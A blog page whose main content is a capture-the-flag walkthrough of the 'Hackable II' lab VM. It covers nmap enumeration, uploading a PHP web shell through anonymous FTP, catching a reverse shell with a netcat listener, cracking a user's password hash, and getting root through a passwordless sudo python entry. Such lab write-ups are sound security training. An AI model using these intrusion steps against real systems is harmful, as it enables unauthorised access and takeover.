Friday, December 31, 2021
X-Plane 11 vs MS Flight Simulator 2020
Wednesday, December 22, 2021
Thursday, November 25, 2021
Wednesday, November 24, 2021
Welcome to Racoon City
Monday, November 22, 2021
The Circleville Letters Mystery
The Dodleston Messages
Monday, November 1, 2021
Oddities in the Cassieverse
Monday, July 26, 2021
CaptureTheFlag - Hackable II
sudo nmap 10.38.1.1/24
Nmap scan report for 10.38.1.7Host is up (0.00036s latency).Not shown: 997 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open httpMAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)
Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extaordinary. So, back to nmap:
sudo nmap --script http-enum.nse 10.38.1.7
This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...
put temp.txt
Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:
put shell.php
And on my kali box:
nc -nlvp 1234
And then I refesh the page in Firefox and switch back to my netcat session and check to see what users are on this box...Interesting...
$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt
One user, shrek, and hmmm...
$ cat important.txt
run the script to see the data
/.runme.sh
Yeah... Not gonna run that... But...
$ cat /.runme.sh
!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'
So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and login via ssh and see what we can do with sudo...
$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
88 packages can be updated.
68 updates are security updates.
Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5
Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:
root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'
invite-me: https://www.linkedin.com/in/eliastouguinho/And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)
